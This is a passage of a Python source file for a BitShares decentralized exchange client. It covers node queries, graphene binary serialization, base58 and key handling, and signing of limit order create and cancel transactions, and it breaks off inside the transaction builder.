    reply = wss_query(["database", "get_required_fees", [ops, "1.3.0"]])
    return {'create': reply[0]['amount'], 'cancel': reply[1]['amount']}
def rpc_balances():
    # Fetch this account's balances for the market currency, the market
    # asset, and core BTS, scaled from graphene ints to decimal amounts.
    balances = wss_query(["database",
                          "get_named_account_balances",
                          [account_name, [currency_id, asset_id, '1.3.0']]])
    # print(balances)
    for balance in balances:
        if balance['asset_id'] == currency_id:
            currency = decimal(balance['amount']) / 10 ** currency_precision
        if balance['asset_id'] == asset_id:
            assets = decimal(balance['amount']) / 10 ** asset_precision
        if balance['asset_id'] == '1.3.0':
            # core BTS always has precision 5
            bitshares = decimal(balance['amount']) / 10 ** 5
    # print(currency, assets, bitshares)
    # NOTE(review): if the node omits any of the three requested assets,
    # the matching local never gets bound and this return raises
    # UnboundLocalError -- presumably get_named_account_balances always
    # returns all requested assets; confirm against node behavior.
    return currency, assets, bitshares
def rpc_open_orders():
    # Return this account's open limit-order ids restricted to the one
    # market defined by the global currency_id/asset_id pair.
    reply = wss_query(["database",
                       "get_full_accounts",
                       [[account_name], "false"]])
    try:
        limit_orders = reply[0][1]['limit_orders']
    except:
        limit_orders = []
    market = [currency_id, asset_id]
    # keep only orders whose base AND quote both belong to this market
    return [order['id'] for order in limit_orders
            if order['sell_price']['base']['asset_id'] in market
            and order['sell_price']['quote']['asset_id'] in market]
def rpc_key_reference(public_key):
    # Map a public key string to the account id(s) that reference it.
    return wss_query(["database",
                      "get_key_references",
                      [[public_key]]])
def rpc_get_transaction_hex_without_sig(tx):
    # Ask a node to serialize tx; used to validate the locally built
    # serialization byte-for-byte.
    hex_string = wss_query(["database",
                            "get_transaction_hex_without_sig",
                            [tx]])
    return bytes(hex_string, 'utf-8')
def rpc_broadcast_transaction(tx):
    # Upload the signed transaction to the blockchain via an rpc node.
    reply = wss_query(["network_broadcast",
                       "broadcast_transaction",
                       [tx]])
    if reply is not None:
        # the node returned an object (error or report); show it
        pprint(reply)
        return reply
    # a None reply means the broadcast was accepted
    print(yellow('*************************************'))
    print('manualSIGNING' + red(' has placed your order'))
    print(yellow('*************************************'))
    return tx
' DATE FORMATTING '
def to_iso_date(unix):
    # Convert a unix epoch (anything int() accepts) to an iso8601
    # datetime string in UTC.
    timestamp = int(unix)
    return datetime.utcfromtimestamp(timestamp).isoformat()
def from_iso_date(iso):
    # Convert an iso8601 'graphene time' string to a unix epoch integer.
    # The appended "UTC" satisfies the %Z directive in ISO8601.
    parsed = strptime(iso + "UTC", ISO8601)
    return int(timegm(parsed))
' GRAPHENEBASE TYPES ' # graphenebase/types.py
def types_README():
    """Executable notes on how __bytes__ "magic" methods drive serialization."""
    # graphenebase types use python "dunder" / "magic" methods
    # these are a little abstract and under documented; to elucidate:
    # bytes() is a "built in" function like str(), int(), list()
    # it returns byte strings like: b'\x00\x00\x00'
    # these methods will redefine the type of byte string
    # returned by the "built in" bytes() in global space
    # but only when bytes() is called on an object that has passed
    # through a class with a "magic" __bytes__ method
    # these methods are used to serialize OrderDicts of various elements
    # graphenebase __str__() methods have been removed
    # as they are unused for limit order operations
    # Set() has been merged into Array()
    # Bool() has been merged into Uint8()
    # Varint32() has been merged into both Id() and Array()
    'consider the following "magic method" example'
    # this would have no effect on the way bytes() normally behaves
    class normal():
        def __init__(self, d):
            self.data = int(d)
        def __bytes__(self):
            return bytes(self.data)
    # this changes what bytes() returns -- a packed unsigned 8 bit int --
    # but only in the case of bytes(Uint8(x))
    class Uint8():
        def __init__(self, d):
            self.data = int(d)
        def __bytes__(self):
            return pack("<B", self.data)
    # this is a definition method to accomplish the same "magic"
    def bytes_Uint8(data):
        return pack("<B", int(data))
    # apply each of these methods to x=3 to show what happens
    x = 3
    print(bytes(x))          # built in: three zero bytes
    print(bytes(normal(x)))  # falls through to the built in behavior
    print(bytes(Uint8(x)))   # packs a single byte
    print(bytes_Uint8(x))    # plain function, same packed byte
    '''
    # >>>
    # b'\x00\x00\x00'
    # b'\x00\x00\x00'
    # b'\x03'
    # b'\x03'
    '''
class ObjectId():
    """Serialize an 'a.b.c' graphene object id (the *instance* part only).

    Only the trailing c element goes on the wire; a and b are validated
    (b against TYPES when type_verify is given) and kept for reference.
    """
    def __init__(self, object_str, type_verify=None):
        # if after splitting a.b.c there are 3 pieces:
        if len(object_str.split(".")) == 3:
            # assign those three pieces to a, b, and c
            a, b, c = object_str.split(".")
            # assure they are integers
            self.a = int(a)
            self.b = int(b)
            self.c = int(c)
            # serialize the c element; the "instance"
            self.instance = Id(self.c)
            self.abc = object_str
            # 1.2.x:account, 1.3.x:asset, or 1.7.x:limit
            if type_verify:
                # BUG FIX: error message typo "Excpected" -> "Expected"
                assert (TYPES[type_verify] == int(b)), (
                    "Object id does not match object type! " +
                    "Expected %d, got %d" %
                    (TYPES[type_verify], int(b)))
        else:
            raise Exception("Object id is invalid")

    def __bytes__(self):
        # b'\x00\x00\x00' of serialized c element; the "instance"
        return bytes(self.instance)
class Id():
    # Wire encoding for the instance (c) element of "a.b.c" object ids.
    # Upstream Varint32() was merged into this class.
    def __init__(self, value):
        self.data = int(value)

    def __bytes__(self):
        # varint encoding of the instance number
        return bytes(varint(self.data))
class Array():
    # Wire encoding for lists: varint length prefix followed by the
    # concatenated serialization of every element.
    # Upstream Set() and Varint32() were merged into this class.
    def __init__(self, items):
        self.data = items
        self.length = int(len(items))

    def __bytes__(self):
        payload = b"".join(bytes(element) for element in self.data)
        return bytes(varint(self.length)) + payload
class Uint8():
    # Wire encoding for an unsigned 8 bit integer.
    # Upstream Bool() was merged into this class.
    def __init__(self, value):
        self.data = int(value)

    def __bytes__(self):
        return pack("<B", self.data)
class Uint16():
    # Wire encoding for a little-endian unsigned 16 bit integer.
    def __init__(self, value):
        self.data = int(value)

    def __bytes__(self):
        return pack("<H", self.data)
class Uint32():
    # Wire encoding for a little-endian unsigned 32 bit integer.
    def __init__(self, value):
        self.data = int(value)

    def __bytes__(self):
        return pack("<I", self.data)
class Int64():
    # Wire encoding for a little-endian *signed* 64 bit integer
    # ("<q" is the signed conversion; negatives are representable).
    def __init__(self, value):
        self.data = int(value)

    def __bytes__(self):
        return pack("<q", self.data)
class Signature():
    # Pass-through wrapper so already-raw signatures survive the generic
    # OrderedDict serialization: __bytes__ returns the stored value
    # itself, deliberately NOT bytes(value).
    def __init__(self, sig):
        self.data = sig

    def __bytes__(self):
        return self.data
class PointInTime():
    # Wire encoding for expiration times: an iso8601 string packed as a
    # 4 byte little-endian unix epoch integer.
    def __init__(self, iso):
        self.data = iso

    def __bytes__(self):
        return pack("<I", from_iso_date(self.data))
' VARINT '
def varint(n):
    # LEB128-style variable length encoding of a non-negative integer:
    # 7 data bits per byte, high bit set on every byte except the last.
    out = bytearray()
    while n >= 0x80:
        out.append((n & 0x7f) | 0x80)
        n >>= 7
    out.append(n)
    return bytes(out)
' BASE 58 ENCODE, DECODE, AND CHECK ' # graphenebase/base58.py
class Base58(object):
    """
    This class serves as an abstraction layer
    to deal with base58 encoded strings
    and their corresponding hex and binary representation
    """
    def __init__(self, data, prefix='BTS'):
        print(green('Base58'))
        print(blue(data))
        self._prefix = prefix
        # plain hex string: store as-is
        if all(c in HEXDIGITS for c in data):
            self._hex = data
        # uncompressed wif keys start with 5 or 6
        elif data[0] == "5" or data[0] == "6":
            self._hex = base58CheckDecode(data)
        # compressed wif keys start with K or L; strip the 01 suffix byte
        elif data[0] == "K" or data[0] == "L":
            self._hex = base58CheckDecode(data)[:-2]
        # public keys carry the chain prefix, e.g. 'BTS...'
        elif data[:len(self._prefix)] == self._prefix:
            self._hex = gphBase58CheckDecode(data[len(self._prefix):])
        else:
            raise ValueError("Error loading Base58 object")

    def __format__(self, _format):
        # format(obj, 'BTS') prepends the chain prefix to the base58 form;
        # any other prefix is used anyway, with a warning
        if _format.upper() == 'BTS':
            return _format.upper() + str(self)
        else:
            print("Format %s unkown. You've been warned!\n" % _format)
            return _format.upper() + str(self)

    def __repr__(self):  # hex string of data
        return self._hex

    def __str__(self):  # base58 string of data
        return gphBase58CheckEncode(self._hex)

    def __bytes__(self):  # raw bytes of data
        return unhexlify(self._hex)
def base58decode(base58_str):
    # Decode a base58 string into its hex representation, preserving
    # leading zero bytes (encoded as leading '1' characters).
    print(green('base58decode'))
    base58_text = bytes(base58_str, "ascii")
    n = 0
    leading_zeroes_count = 0
    # accumulate the big integer; while n is still 0 every consumed
    # character was a leading '1', i.e. a zero byte
    for b in base58_text:
        n = n * 58 + BASE58.find(b)
        if n == 0:
            leading_zeroes_count += 1
    res = bytearray()
    while n >= 256:
        div, mod = divmod(n, 256)
        res.insert(0, mod)
        n = div
    else:
        # while/else: runs once after the loop, storing the final byte
        res.insert(0, n)
    return hexlify(bytearray(1) * leading_zeroes_count + res).decode('ascii')
def base58encode(hexstring):
    # Encode a hex string into base58, preserving leading zero bytes
    # (emitted as leading '1' characters).
    print(green('base58encode'))
    byteseq = bytes(unhexlify(bytes(hexstring, 'ascii')))
    n = 0
    leading_zeroes_count = 0
    # accumulate the big integer; while n is still 0 every consumed
    # byte was a leading zero
    for c in byteseq:
        n = n * 256 + c
        if n == 0:
            leading_zeroes_count += 1
    res = bytearray()
    while n >= 58:
        div, mod = divmod(n, 58)
        res.insert(0, BASE58[mod])
        n = div
    else:
        # while/else: runs once after the loop, storing the final digit
        res.insert(0, BASE58[n])
    ret = (BASE58[0:1] * leading_zeroes_count + res).decode('ascii')
    # public_key = 'BTS' + str(ret)
    # print(purple(public_key), "public key")
    print('len(ret)', len(ret))
    return ret
def ripemd160(s):
    # 160-bit cryptographic hash function applied to the bytes behind
    # the hex string s.
    # NOTE(review): 'ripemd160' is supplied to hashlib.new by OpenSSL and
    # is absent from some modern OpenSSL builds -- confirm availability
    # on the target machine.
    ripemd160 = hashlib_new('ripemd160')  # look up the algorithm
    ripemd160.update(unhexlify(s))
    ret = ripemd160.digest()
    print('use hashlib to perform a ripemd160 message digest')
    print(ret)
    return ret
def doublesha256(s):
    # Apply sha256 twice to the bytes behind the hex string s and return
    # the raw 32 byte digest.
    binary = unhexlify(s)
    digest = sha256(sha256(binary).digest()).digest()
    print('use hashlib to perform a double sha256 message digest')
    print(digest)
    return digest
def base58CheckEncode(version, payload):
    # Prefix the hex payload with a version byte, append the first 4
    # bytes of its double-sha256 checksum, and base58 encode everything.
    print(green('base58CheckEncode'))
    print(payload, version)
    versioned = ('%.2x' % version) + payload
    print(versioned)
    check = doublesha256(versioned)[:4]
    return base58encode(versioned + hexlify(check).decode('ascii'))
def gphBase58CheckEncode(s):
    # Graphene variant of check-encoding: the 4 byte checksum comes from
    # ripemd160 instead of double sha256, and there is no version byte.
    print(yellow('gphBase58CheckEncode'))
    print(s)
    check = ripemd160(s)[:4]
    return base58encode(s + hexlify(check).decode('ascii'))
def base58CheckDecode(s):
    # Base58 decode, verify the trailing 4 byte double-sha256 checksum,
    # and strip the leading version byte from the hex payload.
    print(green('base58CheckDecode'))
    print(s)
    raw = unhexlify(base58decode(s))
    payload = hexlify(raw[:-4]).decode('ascii')
    assert(raw[-4:] == doublesha256(payload)[:4])
    # drop the 1 byte (2 hex char) version prefix
    return payload[2:]
def gphBase58CheckDecode(s):
    # Graphene variant: verify the ripemd160 checksum; unlike
    # base58CheckDecode there is no version byte to strip.
    print(yellow('gphBase58CheckDecode'))
    print(s)
    raw = unhexlify(base58decode(s))
    payload = hexlify(raw[:-4]).decode('ascii')
    assert(raw[-4:] == ripemd160(payload)[:4])
    return payload
' ADDRESS AND KEYS '
class Address(object):  # cropped litepresence2019
    """
    Example :: Address("BTSFN9r6VYzBK8EKtMewfNbfiGCr56pHDBFi")
    """
    # graphenebase/account.py
    # Thin holder pairing a Base58-wrapped public key with its chain
    # prefix; address derivation itself was cropped out as unused here.
    def __init__(self, address=None, pubkey=None, prefix="BTS"):
        # NOTE(review): the `address` parameter is accepted but unused
        print(red('Address'), 'pubkey', pubkey)
        self.prefix = prefix
        self._pubkey = Base58(pubkey, prefix=prefix)
        self._address = None
class PublicKey(Address):  # graphenebase/account.py
    """
    This class deals with Public Keys and inherits ``Address``.
    :param str pk: Base58 encoded public key
    :param str prefix: Network prefix (defaults to ``BTS``)
    """
    def __init__(self, pk, prefix="BTS"):
        # `authenticated` is module-level state flipped to True when this
        # key is proven to belong to the global account_id
        global authenticated
        print(red('PublicKey'))
        self.prefix = prefix
        self._pk = Base58(pk, prefix=prefix)
        self.address = Address(pubkey=pk, prefix=prefix)
        self.pubkey = self._pk
        public_key = prefix + str(self._pk)
        # `login` is a module-level flag set by the login edict; 53 is
        # the length of a prefixed compressed public key string
        if login and (len(public_key) == 53):
            try:
                public_key = prefix + str(self._pk)
                print(public_key)
                print(len(public_key))
                # ask a node which account references this key
                account = rpc_key_reference(public_key)
                print(str(account[0][0]))
                print(str(account_id))
                if str(account[0][0]) == str(account_id):
                    authenticated = True
                print ('authenticated:', authenticated)
            except:
                # best effort: any rpc/parse failure simply leaves
                # `authenticated` unchanged
                pass

    def _derive_y_from_x(self, x, is_even):
        print(purple(' y^2 = x^3 + ax + b '))
        print(self, x)
        """ Derive y point from x point """
        curve = ecdsa_SECP256k1.curve
        a, b, p = curve.a(), curve.b(), curve.p()
        # candidate y from the curve equation; pick the root whose
        # parity matches the 02/03 compression prefix
        alpha = (pow(x, 3, p) + a * x + b) % p
        beta = ecdsa_numbertheory.square_root_mod_prime(alpha, p)
        if (beta % 2) == is_even:
            beta = p - beta
        print(beta)
        return beta

    def compressed(self):
        print('PublicKey.compressed')
        """ Derive compressed public key """
        order = ecdsa_SECP256k1.generator.order()
        p = ecdsa_VerifyingKey.from_string(
            bytes(self),
            curve=ecdsa_SECP256k1).pubkey.point
        x_str = ecdsa_util.number_to_string(p.x(), order)
        # y_str = ecdsa_util.number_to_string(p.y(), order)
        # prefix byte 02/03 encodes the parity of y
        compressed = hexlify(
            bytes(chr(2 + (p.y() & 1)),
                  'ascii') + x_str).decode('ascii')
        return(compressed)

    def unCompressed(self):
        print('PublicKey.unCompressed')
        """ Derive uncompressed key """
        public_key = repr(self._pk)
        prefix = public_key[0:2]
        # 04 prefix means already uncompressed: return as-is
        if prefix == "04":
            return public_key
        assert prefix == "02" or prefix == "03"
        x = int(public_key[2:], 16)
        y = self._derive_y_from_x(x, (prefix == "02"))
        key = '04' + '%064x' % x + '%064x' % y
        return key

    def __repr__(self):
        # print('PublicKey.__repr__')
        """ Gives the hex representation of the Graphene public key. """
        return repr(self._pk)

    def __format__(self, _format):
        # print('PublicKey.__format__')
        """ Formats the instance of:doc:`Base58 <base58>
        ` according to ``_format`` """
        return format(self._pk, _format)

    def __bytes__(self):
        # print('PublicKey.__bytes__')
        """ Returns the raw public key (has length 33)"""
        return bytes(self._pk)
class PrivateKey(PublicKey):  # merged litepresence2019
    # Bitshares(MIT) graphenebase/account.py
    # Bitshares(MIT) bitsharesbase/account.py
    """ Derives the compressed and uncompressed public keys and
        constructs two instances of ``PublicKey``:
    """
    def __init__(self, wif=None, prefix="BTS"):
        print(prefix)
        print(red('PrivateKey'))
        print(PublicKey)
        if wif is None:
            # no wif given: generate a random 32 byte private key
            import os
            self._wif = Base58(hexlify(os.urandom(32)).decode('ascii'))
        elif isinstance(wif, Base58):
            self._wif = wif
        else:
            self._wif = Base58(wif)
        # compress pubkeys only
        self._pubkeyhex, self._pubkeyuncompressedhex = self.compressedpubkey()
        self.pubkey = PublicKey(self._pubkeyhex, prefix=prefix)
        self.uncompressed = PublicKey(
            self._pubkeyuncompressedhex,
            prefix=prefix)
        self.uncompressed.address = Address(
            pubkey=self._pubkeyuncompressedhex,
            prefix=prefix)
        self.address = Address(pubkey=self._pubkeyhex, prefix=prefix)

    def compressedpubkey(self):
        print('PrivateKey.compressedpubkey')
        """ Derive uncompressed public key """
        # returns [compressed_hex, uncompressed_hex] derived via ecdsa
        secret = unhexlify(repr(self._wif))
        order = ecdsa_SigningKey.from_string(
            secret,
            curve=ecdsa_SECP256k1).curve.generator.order()
        p = ecdsa_SigningKey.from_string(
            secret,
            curve=ecdsa_SECP256k1).verifying_key.pubkey.point
        x_str = ecdsa_util.number_to_string(p.x(), order)
        y_str = ecdsa_util.number_to_string(p.y(), order)
        # 02/03 prefix encodes y parity; 04 prefix marks uncompressed
        compressed = hexlify(
            chr(2 + (p.y() & 1)).encode('ascii') + x_str).decode('ascii')
        uncompressed = hexlify(
            chr(4).encode('ascii') + x_str + y_str).decode('ascii')
        return([compressed, uncompressed])

    def __bytes__(self):
        # print('PrivateKey.__bytes__')
        """ Returns the raw private key """
        return bytes(self._wif)
' SERIALIZATION '
class GrapheneObject(object):  # Bitshares(MIT) graphenebase/objects.py
    """Base wire serializer: concatenates bytes() of each field in order."""

    def __init__(self, data=None):
        # data is an OrderedDict mapping field name -> serializable value
        self.data = data

    def __bytes__(self):
        # encode into wire format; empty when no data is attached
        if self.data is None:
            return bytes()
        chunks = []
        for value in self.data.values():
            if isinstance(value, str):
                # raw strings are utf-8 encoded as-is
                chunks.append(bytes(value, 'utf-8'))
            else:
                # every other field type supplies its own __bytes__
                chunks.append(bytes(value))
        return b"".join(chunks)
class Asset(GrapheneObject):  # bitsharesbase/objects.py
    # Serializer for an asset amount: Int64 amount + ObjectId asset_id.
    def __init__(self, *args, **kwargs):
        # copy-constructor path (isArgsThisClass is defined later in
        # this file): reuse the other instance's data verbatim
        if isArgsThisClass(self, args):
            self.data = args[0].data
        else:
            # a single positional dict is treated as the kwargs
            if len(args) == 1 and len(kwargs) == 0:
                kwargs = args[0]
            # field order below is the wire order
            super().__init__(OrderedDict([
                ('amount', Int64(kwargs["amount"])),
                ('asset_id', ObjectId(kwargs["asset_id"], "asset"))
            ]))
class Operation():  # refactored litepresence2019
    'class GPHOperation():'
    # Bitshares(MIT) graphenebase/objects.py
    'class Operation(GPHOperation):'
    # Bitshares(MIT) bitsharesbase/objects.py
    # Wraps one [op_id, params] pair and serializes it as a varint id
    # followed by the serialized operation body.
    def __init__(self, op):
        # validate the [int, dict] shape before dispatching
        if not (isinstance(op, list)):
            raise ValueError('expecting op to be a list')
        if not (len(op) == 2):
            raise ValueError('expecting op to be two items')
        if not (isinstance(op[0], int)):
            raise ValueError('expecting op[0] to be integer')
        self.opId = op[0]
        name = OP_NAMES[self.opId]
        self.name = name[0].upper() + name[1:]
        # NOTE(review): only ids 1 and 2 assign self.op; any other id
        # present in OP_NAMES would leave self.op unset and make
        # __bytes__ raise AttributeError
        if op[0] == 1:
            self.op = Limit_order_create(op[1])
        if op[0] == 2:
            self.op = Limit_order_cancel(op[1])
    def __bytes__(self):
        print(yellow('GPHOperation.__bytes__'))
        # wire format: varint operation id, then the operation body
        return bytes(Id(self.opId)) + bytes(self.op)
class Signed_Transaction(GrapheneObject):  # merged litepresence2019
    # Bitshares(MIT) graphenebase/signedtransactions.py
    # Bitshares(MIT) bitsharesbase/signedtransactions.py
    # Builds the full transaction wire object (header, operations,
    # extensions, signatures) and offers digest/sign/verify methods.
    def __init__(self, *args, **kwargs):
        print(red('Signed_Transaction'))
        print(
            """ Create a signed transaction and
            offer method to create the signature
            (see ``getBlockParams``)
            :param num refNum: parameter ref_block_num
            :param num refPrefix: parameter ref_block_prefix
            :param str expiration: expiration date
            :param Array operations: array of operations
            """
        )
        print('args, kwargs', args, kwargs)
        # copy-constructor path: reuse the other instance's data verbatim
        if isArgsThisClass(self, args):
            self.data = args[0].data
        else:
            # a single positional dict is treated as the kwargs
            if len(args) == 1 and len(kwargs) == 0:
                kwargs = args[0]
            # missing or falsy extensions become an empty Array
            if "extensions" not in kwargs:
                kwargs["extensions"] = Array([])
            elif not kwargs.get("extensions"):
                kwargs["extensions"] = Array([])
            if "signatures" not in kwargs:
                kwargs["signatures"] = Array([])
            else:
                # hex signature strings are unwrapped into Signature()
                kwargs["signatures"] = Array(
                    [Signature(unhexlify(a)) for a in kwargs["signatures"]])
            if "operations" in kwargs:
                opklass = self.getOperationKlass()
                # wrap raw [id, params] pairs unless already Operation
                if all([not isinstance(a, opklass)
                        for a in kwargs["operations"]]):
                    kwargs['operations'] = Array(
                        [opklass(a) for a in kwargs["operations"]])
                else:
                    kwargs['operations'] = Array(kwargs["operations"])
            # field order below is the wire order and must not change
            super().__init__(OrderedDict([
                ('ref_block_num', Uint16(kwargs['ref_block_num'])),
                ('ref_block_prefix', Uint32(kwargs['ref_block_prefix'])),
                ('expiration', PointInTime(kwargs['expiration'])),
                ('operations', kwargs['operations']),
                ('extensions', kwargs['extensions']),
                ('signatures', kwargs['signatures']),
            ]))
    @property
    def id(self):
        print('Signed_Transaction.id')
        """
        The transaction id of this transaction
        """
        # Store signatures temporarily since they are not part of the id
        sigs = self.data["signatures"]
        self.data.pop("signatures", None)
        # Generate hash of the serialized version
        h = sha256(bytes(self)).digest()
        # Recover signatures
        self.data["signatures"] = sigs
        # Return properly truncated tx hash (first 20 bytes, hex)
        return hexlify(h[:20]).decode("ascii")
    def getOperationKlass(self):
        print('Signed_Transaction.get_operationKlass')
        # operations are (de)serialized through the Operation wrapper
        return Operation
    def derSigToHexSig(self, s):
        print('Signed_Transaction.derSigToHexSig')
        # convert a DER encoded signature into a 64 byte (r, s) hex pair
        s, junk = ecdsa_der.remove_sequence(unhexlify(s))
        if junk:
            # NOTE(review): `log` is not defined anywhere in this module;
            # reaching this line would raise NameError -- confirm upstream
            log.debug('JUNK: %s', hexlify(junk).decode('ascii'))
        assert(junk == b'')
        x, s = ecdsa_der.remove_integer(s)
        y, s = ecdsa_der.remove_integer(s)
        return '%064x%064x' % (x, y)
    def deriveDigest(self, chain):
        print('Signed_Transaction.deriveDigest')
        print(self, chain)
        # Do not serialize signatures
        sigs = self.data["signatures"]
        self.data["signatures"] = []
        # Get message to sign
        # bytes(self) will give the wire formated data according to
        # GrapheneObject and the data given in __init__()
        # NOTE(review): `chain` is unused here; the chain id comes from
        # the module-level constant ID set by global_constants()
        self.message = unhexlify(ID) + bytes(self)
        self.digest = sha256(self.message).digest()
        # restore signatures
        self.data["signatures"] = sigs
    def verify(self, pubkeys=[], chain="BTS"):
        # Recover the public key behind each signature and require that
        # every pubkey in `pubkeys` is among them.
        # NOTE(review): mutable default pubkeys=[] is read-only here,
        # so the shared-default pitfall does not bite.
        print(green('###############################################'))
        print('Signed_Transaction.verify')
        print(green('self, pubkeys, chain'), self, pubkeys, chain)
        self.deriveDigest(chain)
        print(green('self'))
        print(self)
        signatures = self.data["signatures"].data
        print(green('signatures'))
        print(signatures)
        pubKeysFound = []
        for signature in signatures:
            # recover the uncompressed public key from the signature
            p = verify_message(
                self.message,
                bytes(signature)
            )
            phex = hexlify(p).decode('ascii')
            print('')
            print('')
            print(green('phex'))
            print(green(phex))
            print(cyan('len(phex)'), len(str(phex)))
            print('')
            print('')
            pubKeysFound.append(phex)
        for pubkey in pubkeys:
            print(green('for pubkey in pubkeys:'))
            print(green('************ pubkey ************'))
            print(blue('repr(pubkey)'))
            print(repr(pubkey))
            print(cyan('len(pubkey)'), len(str(pubkey)))
            print('')
            if not isinstance(pubkey, PublicKey):
                raise Exception("Pubkeys must be array of 'PublicKey'")
            # compare against the uncompressed form minus the 04 prefix
            k = pubkey.unCompressed()[2:]
            print(green('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>'))
            print(yellow('k'))
            print(k)
            print(cyan('len(k)'), len(str(k)))
            print(yellow('pubKeysFound'))
            print(pubKeysFound)
            print(cyan('len(pubKeysFound[0])'), len(pubKeysFound[0]))
            print('')
            print(green('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>'))
            if k not in pubKeysFound and repr(pubkey) not in pubKeysFound:
                print(
                    blue('if k not in pubKeysFound and repr(pubkey) ' +
                         'not in pubKeysFound:'))
                k = PublicKey(PublicKey(k).compressed())
                f = format(k, 'BTS')  # chain_params["prefix"]) # 'BTS'
                print('')
                print(red('FIXME'))
                raise Exception("Signature for %s missing!" % f)
        return pubKeysFound
    def sign(self, wifkeys, chain="BTS"):
        print('Signed_Transaction.sign')
        """
        Sign the transaction with the provided private keys.
        """
        self.deriveDigest(chain)
        # Get Unique private keys (preserving first-seen order)
        self.privkeys = []
        [self.privkeys.append(item)
         for item in wifkeys if item not in self.privkeys]
        # Sign the message with every private key given!
        sigs = []
        for wif in self.privkeys:
            signature = sign_message(self.message, wif)
            sigs.append(Signature(signature))
        self.data["signatures"] = Array(sigs)
        return self
class Limit_order_create(GrapheneObject):  # bitsharesbase/operations.py
    """Graphene 'limit_order_create' operation (opcode 1)."""

    def __init__(self, *args, **kwargs):
        if isArgsThisClass(self, args):
            # copy-construct from another instance of this class
            self.data = args[0].data
            return
        if len(args) == 1 and len(kwargs) == 0:
            kwargs = args[0]
        # field order is significant for graphene serialization
        fields = OrderedDict()
        fields['fee'] = Asset(kwargs["fee"])
        fields['seller'] = ObjectId(kwargs["seller"], "account")
        fields['amount_to_sell'] = Asset(kwargs["amount_to_sell"])
        fields['min_to_receive'] = Asset(kwargs["min_to_receive"])
        fields['expiration'] = PointInTime(kwargs["expiration"])
        fields['fill_or_kill'] = Uint8(kwargs["fill_or_kill"])
        fields['extensions'] = Array([])
        super().__init__(fields)
class Limit_order_cancel(GrapheneObject):  # bitsharesbase/operations.py
    """Graphene 'limit_order_cancel' operation (opcode 2)."""

    def __init__(self, *args, **kwargs):
        if isArgsThisClass(self, args):
            # copy-construct from another instance of this class
            self.data = args[0].data
            return
        if len(args) == 1 and len(kwargs) == 0:
            kwargs = args[0]
        # field order is significant for graphene serialization
        fields = OrderedDict()
        fields['fee'] = Asset(kwargs["fee"])
        fields['fee_paying_account'] = ObjectId(
            kwargs["fee_paying_account"], "account")
        fields['order'] = ObjectId(kwargs["order"], "limit_order")
        fields['extensions'] = Array([])
        super().__init__(fields)
def verify_message(message, signature, hashfn=sha256):
    # graphenebase/ecdsa.py stripped of non-secp256k1 methods
    """Recover and verify the public key that produced *signature*.

    :param message: bytes (or str, utf-8 encoded) that was signed
    :param signature: 65-byte compact signature (recovery byte + 64 bytes)
    :param hashfn: retained for interface compatibility; secp256k1's
        ``ecdsa_recover`` hashes the message itself internally, so the
        previously computed local digest was dead code and was removed
    :return: the recovered public key serialized in compressed form
    """
    print(red('verify_message...return phex'))
    # require message and signature to be bytes
    if not isinstance(message, bytes):
        message = bytes(message, "utf-8")
    if not isinstance(signature, bytes):
        signature = bytes(signature, "utf-8")
    # strip the leading recovery byte; the rest is the compact signature
    sig = signature[1:]
    # recover parameter only (undo the +4 "compressed" and +27 "compact"
    # offsets applied at signing time)
    recoverParameter = bytearray(signature)[0] - 4 - 27
    # "bitwise or"; each bit of the output is 0
    # if the corresponding bit of x AND of y is 0, otherwise it's 1
    ALL_FLAGS = (secp256k1_lib.SECP256K1_CONTEXT_VERIFY |
                 secp256k1_lib.SECP256K1_CONTEXT_SIGN)
    # ecdsa.PublicKey with additional functions to serialize
    # in uncompressed and compressed formats
    pub = secp256k1_PublicKey(flags=ALL_FLAGS)
    # recover raw signature
    sig = pub.ecdsa_recoverable_deserialize(sig, recoverParameter)
    # recover public key (the library hashes `message` itself)
    verifyPub = secp256k1_PublicKey(pub.ecdsa_recover(message, sig))
    # convert recoverable sig to normal sig
    normalSig = verifyPub.ecdsa_recoverable_convert(sig)
    # verify; raises if the signature does not match the recovered key
    verifyPub.ecdsa_verify(message, normalSig)
    phex = verifyPub.serialize(compressed=True)
    return phex
def isArgsThisClass(self, args):  # graphenebase/objects.py
    """Return True when *args* holds exactly one positional argument whose
    type name matches the type name of *self*."""
    if len(args) != 1:
        return False
    return type(args[0]).__name__ == type(self).__name__
' PRIMARY TRANSACTION BACKBONE '
def build_transaction(order):
    """Convert a human-terms buy/sell/cancel *order* into an unsigned
    graphene transaction dict.

    Validates the order header, fetches block/fee data over RPC, sorts
    edicts by type, autoscales amounts to funds on hand, strips dust,
    and translates each edict into a graphene operation list.

    :param order: dict with 'edicts' (list), 'nodes' (list) and
        'header' (dict of account/asset ids and precisions)
    :return: transaction dict ready for serialization and signing
    :raises ValueError: on malformed order structure or object ids
    """
    # this performs incoming limit order api conversion
    # from human terms to graphene terms
    # humans speak:
    "account name, asset name, order number"
    "decimal amounts, rounded is just fine"
    "buy/sell/cancel"
    "amount of assets"
    "price in currency"
    # graphene speaks:
    "1.2.x, 1.3.x, 1.7.x"
    "only in integers"
    "create/cancel"
    "min_to_receive/10^receiving_precision"
    "amount_to_sell/10^selling_precision"
    # build_transaction speaks:
    "list of buy/sell/cancel human terms edicts any order in"
    "validated data request"
    "autoscale amounts if out of budget"
    "autoscale amounts if spending last bitshare"
    "bundled cancel/buy/sell transactions out; cancel first"
    "prevent inadvertent huge number of orders"
    "do not place orders for dust amounts"
    global account_id, account_name, currency_id, asset_id
    global currency_precision, asset_precision
    ' VALIDATE INCOMING DATA '
    if not isinstance(order['edicts'], list):
        raise ValueError('order parameter must be list: %s' % order['edicts'])
    if not isinstance(order['nodes'], list):
        raise ValueError('order parameter must be list: %s' % order['nodes'])
    if not isinstance(order['header'], dict):
        raise ValueError('order parameter must be list: %s' % order['header'])
    # the location of the decimal place must be provided by order
    currency_precision = int(order['header']['currency_precision'])
    asset_precision = int(order['header']['asset_precision'])
    # validate a.b.c identifiers of account id and asset ids
    currency_id = str(order['header']['currency_id'])
    asset_id = str(order['header']['asset_id'])
    account_id = str(order['header']['account_id'])
    account_name = str(order['header']['account_name'])
    for i in [account_id, currency_id, asset_id]:
        try:
            # each id must be three dot-separated integers, e.g. "1.2.345"
            a, b, c = i.split('.')
            int(a) == 1
            int(b) in [2, 3]
            int(c) == float(c)
        except:
            raise ValueError('invalid object id %s' % i)
    ' GATHER TRANSACTION HEADER DATA '
    # fetch block data via websocket request
    block = rpc_block_number()
    # low 16 bits of the head block number, per graphene TaPoS rules
